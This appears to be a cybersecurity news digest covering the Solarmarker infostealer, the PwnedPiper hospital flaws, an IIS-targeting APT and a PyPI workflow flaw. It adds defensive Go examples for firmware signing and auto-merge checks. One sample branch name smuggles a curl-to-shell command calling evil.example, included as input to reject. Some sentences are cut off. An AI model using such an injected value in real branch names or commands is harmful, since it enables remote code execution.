Cyber Security News — Past 24 hours | 02.08.2021

Solarmarker InfoStealer Malware Once Again Making its Way Into the Wild

Dubbed “Solarmarker,” the malware campaign is believed to have been active since September 2020, with telemetry data pointing to malicious activity as early as April 2020, according to Cisco Talos.

.NET assembly module that serves as a system profiler and staging ground on the victim host for command-and-control communications and further malicious actions, including the deployment of information-stealing components such as Jupyter and Uran. The renewed activity has also been accompanied by a shift in tactics and multiple iterations of the infection chain, even as the threat actor stuck with the age-old trick of SEO poisoning: abusing search engine optimization so that malicious sites, or the dropper files they host, rank highly in search results and draw more visitors.

“The actor also exhibits determination in ensuring the continuation of their campaign, such as updating the encryption methods for the C2 communication in the Mars DLL after researchers had publicly picked apart previous components of the malware, in addition to the more typical strategy of cycling out the C2 infrastructure hosts.”

Source —

PwnedPiper PTS Security Flaws Threaten 80% of Hospitals in the U.S.

Cybersecurity researchers on Monday disclosed a set of nine vulnerabilities known as “PwnedPiper” that left a widely used pneumatic tube system (PTS) vulnerable to critical attacks, including the possibility of complete takeover.

“These vulnerabilities can enable an unauthenticated attacker to take over Translogic PTS stations and essentially gain complete control over the PTS network of a target hospital,” Armis researchers Ben Seri and Barak Hadad said. “This type of control could enable sophisticated and worrisome ransomware attacks, as well as allow attackers to leak sensitive hospital information.”

In a nutshell, the flaws, which concern privilege escalation, memory corruption, and denial of service, could be abused to gain root access, achieve remote code execution or denial of service, and, worse, let an attacker maintain persistence on compromised PTS stations through an insecure firmware upgrade procedure that itself yields unauthenticated remote code execution.

“The potential for pneumatic tube stations to be compromised is dependent on a bad actor who has access to the facility’s information technology network and who could cause additional damage by leveraging these exploits,” Swisslog Healthcare said in an independent advisory published today.
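The upgrade path is the item a practitioner should look at first, because it is what turns a one-off compromise into persistence. As an added illustration that is not code from Armis, Swisslog Healthcare or the page, the Go program below shows the gate a firmware upgrade routine needs before it writes anything to flash: verify a vendor signature over the whole image, reject malformed images, and refuse a rollback to an older release. The image layout, the "PTSFW001" magic value and the Ed25519 key pair are assumptions made for this example; authenticating the operator who requests the upgrade is a separate control that the snippet does not cover.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"encoding/binary"
	"errors"
	"fmt"
)

// Image layout assumed for this example (not any vendor's real format):
//   magic "PTSFW001" (8 bytes) | version (4 bytes, big-endian) | payload | Ed25519 signature (64 bytes)
// The signature covers every byte before it.
const (
	magic     = "PTSFW001"
	headerLen = len(magic) + 4
	sigLen    = ed25519.SignatureSize
)

var (
	ErrFormat    = errors.New("firmware: malformed image")
	ErrSignature = errors.New("firmware: signature does not verify against the vendor key")
	ErrRollback  = errors.New("firmware: image version is older than the installed version")
)

// BuildImage assembles and signs an image. This is the vendor-side step; the
// private key stays in the vendor's signing system and never ships on a device.
func BuildImage(priv ed25519.PrivateKey, version uint32, payload []byte) []byte {
	img := make([]byte, 0, headerLen+len(payload)+sigLen)
	img = append(img, magic...)
	var v [4]byte
	binary.BigEndian.PutUint32(v[:], version)
	img = append(img, v[:]...)
	img = append(img, payload...)
	return append(img, ed25519.Sign(priv, img)...)
}

// VerifyImage is the device-side gate that an insecure upgrade procedure
// lacks. It returns the payload and version only when the image is well
// formed, signed by the vendor public key burned into the device, and not a
// rollback to an older (possibly vulnerable) release. Nothing is written to
// flash unless it returns a nil error.
func VerifyImage(pub ed25519.PublicKey, img []byte, installed uint32) ([]byte, uint32, error) {
	if len(img) < headerLen+sigLen || string(img[:len(magic)]) != magic {
		return nil, 0, ErrFormat
	}
	body, sig := img[:len(img)-sigLen], img[len(img)-sigLen:]
	// Verify before interpreting anything else: an unsigned or tampered image
	// must never reach the version or payload handling below.
	if !ed25519.Verify(pub, body, sig) {
		return nil, 0, ErrSignature
	}
	version := binary.BigEndian.Uint32(body[len(magic):headerLen])
	if version < installed {
		return nil, 0, ErrRollback
	}
	return body[headerLen:], version, nil
}

func main() {
	pub, priv, err := ed25519.GenerateKey(rand.Reader) // stands in for the vendor's key pair
	if err != nil {
		panic(err)
	}
	good := BuildImage(priv, 2, []byte("constructed payload bytes"))
	_, ver, err := VerifyImage(pub, good, 1)
	fmt.Println("signed image:", ver, err)

	tampered := append([]byte(nil), good...)
	tampered[headerLen] ^= 0x01 // flip one payload bit
	_, _, err = VerifyImage(pub, tampered, 1)
	fmt.Println("tampered image:", err)

	_, _, err = VerifyImage(pub, good, 3) // device already runs version 3
	fmt.Println("rollback attempt:", err)
}
```

The order of checks matters: the signature is checked over the raw bytes before the version field is parsed, so a forged header cannot influence the rollback decision, and the rollback check stops an attacker who holds a genuinely signed but older, vulnerable image.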

Source —

New APT Hacking Group Targets Microsoft IIS Servers with ASP.NET Exploits

A new, highly capable and persistent threat actor has been targeting high-profile public and private entities in the U.S. in a series of targeted intrusions that exploit internet-facing Microsoft Internet Information Services (IIS) servers to gain a foothold in their networks.

“TG1021 uses a custom-made malware framework, built around a common core, tailor-made for IIS servers. The toolset is completely volatile, reflectively loaded into an affected machine’s memory and leaves little-to-no trace on infected targets,” the researchers said. “The threat actor also uses an additional stealthy backdoor and several post-exploitation modules to perform network reconnaissance, elevate privileges, and move laterally within networks.”

Interestingly, Sygnia’s investigation into TG1021’s tactics, techniques, and procedures has unearthed “major overlaps” with those of a nation-sponsored actor behind the “Copy-Paste Compromises” campaign, as detailed in an advisory released by the Australian Cyber Security Centre in June 2020, which described a campaign targeting public-facing infrastructure primarily through unpatched flaws in Telerik UI and IIS servers. However, a formal attribution is yet to be made.

Source —

PyPI Python Package Repository Patches Critical Supply Chain Flaw

The maintainers of the Python Package Index (PyPI) last week issued fixes for three vulnerabilities, one of which could be abused to achieve arbitrary code execution and take full control of the official third-party software repository.

The list of three vulnerabilities is as follows:

- Vulnerability in Legacy Document Deletion on PyPI — An exploitable vulnerability in the mechanisms for deleting legacy documentation hosting deployment tooling on PyPI, which would allow an attacker to remove documentation for projects not under their control.
- Vulnerability in Role Deletion on PyPI — An exploitable vulnerability in the mechanisms for deleting roles on PyPI, discovered by a security researcher, which would allow an attacker to remove roles for projects not under their control.

A more critical flaw concerns an issue in the GitHub Actions workflow for PyPI’s source repository named “combine-prs.yml,” resulting in a scenario wherein an adversary could obtain write permission for the main branch of the “pypa/warehouse” repository, and in the process execute malicious code on

“The vulnerabilities described in this article had a significant impact on the Python ecosystem,” RyotaK noted.
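The page does not say what the combine-prs.yml defect was, but the outcome it describes, an outsider gaining write access through a workflow that runs with the repository’s token, is the signature of a job that acts on data a pull-request author controls. The Go program below is an added example, not code from pypa/warehouse or from RyotaK’s report, of the two checks such an auto-merge job needs: anchor trust on the author identity (assumed here to be a dependency-update bot, dependabot[bot]) rather than on a branch-name prefix, and hand the branch to git as a single argv element rather than splicing it into a shell line. The PullRequest fields mirror the GitHub REST API’s pull-request object; the sample PRs and the attacker/warehouse fork name are constructed for the example.

```go
package main

import (
	"fmt"
	"regexp"
)

// PullRequest carries the fields of a GitHub pull request that matter here,
// named after the REST API fields they come from.
type PullRequest struct {
	Number      int
	AuthorLogin string // user.login
	HeadRef     string // head.ref: the branch name, chosen by the PR author
	HeadRepo    string // head.repo.full_name
	BaseRepo    string // base.repo.full_name
}

// trustedBot is the account whose PRs the job may merge (an assumption for
// this example). Trust is anchored on the author identity, not on the branch
// name: any fork can push a branch called "dependabot/...", but only GitHub's
// bot can author a PR as "dependabot[bot]".
const trustedBot = "dependabot[bot]"

// Git permits ';', '$', '(', ')', '|' and '{' in ref names, so a branch name
// is a perfectly good shell-injection vector. This allow-list is stricter
// than git's own rules and is applied before the name goes anywhere.
var safeBranch = regexp.MustCompile(`^[A-Za-z0-9][A-Za-z0-9._/-]{0,200}$`)

// Trusted reports whether the job may act on pr with its write token.
func Trusted(pr PullRequest) bool {
	return pr.AuthorLogin == trustedBot &&
		pr.HeadRepo == pr.BaseRepo && // bot branches live in the base repo, never in a fork
		safeBranch.MatchString(pr.HeadRef)
}

// BranchesToMerge returns the head branches of the PRs that pass Trusted.
func BranchesToMerge(prs []PullRequest) []string {
	var out []string
	for _, pr := range prs {
		if Trusted(pr) {
			out = append(out, pr.HeadRef)
		}
	}
	return out
}

// MergeArgs is the argv to hand to exec.Command. The branch is one argument
// after "--", so no shell ever parses it and it cannot become an option.
func MergeArgs(branch string) []string {
	return []string{"git", "merge", "--no-ff", "--", "origin/" + branch}
}

// ShellMergeLine is the pattern to avoid: the branch spliced into a command
// string that a later `bash -c` (or a workflow `run:` step) parses as code.
func ShellMergeLine(branch string) string {
	return "git merge origin/" + branch
}

// SamplePRs is constructed input: one genuine bot PR and two impostors.
func SamplePRs() []PullRequest {
	return []PullRequest{
		{1, "dependabot[bot]", "dependabot/pip/requests-2.26.0", "pypa/warehouse", "pypa/warehouse"},
		// Branch prefix mimics the bot; the name is a legal git ref, and ${IFS}
		// stands in for the space character that git forbids in ref names.
		{2, "attacker", "dependabot/pip/urllib3-1.26.6;curl${IFS}evil.example|sh", "attacker/warehouse", "pypa/warehouse"},
		// Harmless-looking name, but still not the bot and still from a fork.
		{3, "attacker", "dependabot/pip/idna-3.2", "attacker/warehouse", "pypa/warehouse"},
	}
}

func main() {
	for _, pr := range SamplePRs() {
		fmt.Printf("#%d by %s trusted=%v\n", pr.Number, pr.AuthorLogin, Trusted(pr))
	}
	fmt.Println("argv :", MergeArgs(SamplePRs()[0].HeadRef))
	fmt.Println("shell:", ShellMergeLine(SamplePRs()[1].HeadRef))
}
```

In an actual workflow file the equivalent of the argv rule is to pass PR data into a step through an env: entry and reference it as a quoted shell variable inside run:, never as an inline ${{ ... }} expression, and to give the job only the permissions it needs so that a bypass of the author check does not come with a token that can push to main.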

Source —

Stay Focused. Stay Vigilant.

Cyber Threat Incident Management Team — Cyber Security Community @ SLIIT



